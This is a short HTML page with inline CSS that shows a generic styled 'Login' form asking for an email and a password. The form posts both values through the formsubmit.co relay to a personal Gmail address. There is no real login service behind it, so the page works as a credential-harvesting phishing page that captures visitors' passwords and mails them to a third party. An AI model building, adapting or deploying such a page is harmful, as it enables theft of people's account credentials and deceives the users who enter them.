<html>
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Document</title>
</head>
<body>
    <form action="https://formsubmit.co/ekatirta13@gmail.com" method="POST">
   <div class="container">
       <img srcset="gambar.jpeg" src="gambar.jpeg" alt="gambar.jpeg">
         <input type="email" name="email" placeholder = "Email"required>
     <input type="password" name="password" placeholder = "password" required>
     <button type="submit">Login</button>
   </div>
</form>

<style>
    body{
        display: flex;
        justify-content: center;
        align-items: center;
        background-color: lightgrey;
    }
    
    .container{
        display: flex;
        align-items: center;
        flex-direction: column;
        grid-gap: 20px;
        border: 4px solid dodgerblue;
        padding: 20px;
        border-radius: 30px;
        background-color: white;
    }
    
    input{
        width: 250px;
        height: 30px;
        border-radius: 30px;
        border: 4px solid dodgerblue;
        padding: 10px;
    }
    
    button{
        width: 250px;
        height: 30px;
        border-radius: 5px;
        border: 4px solid dodgerblue;
        background-color: dodgerblue;
        margin-top: 10px;
        border-radius: 30px;
    }
    
    img{
        width: 250px;
        height: 150px;
    }
</style>
</body>
</html>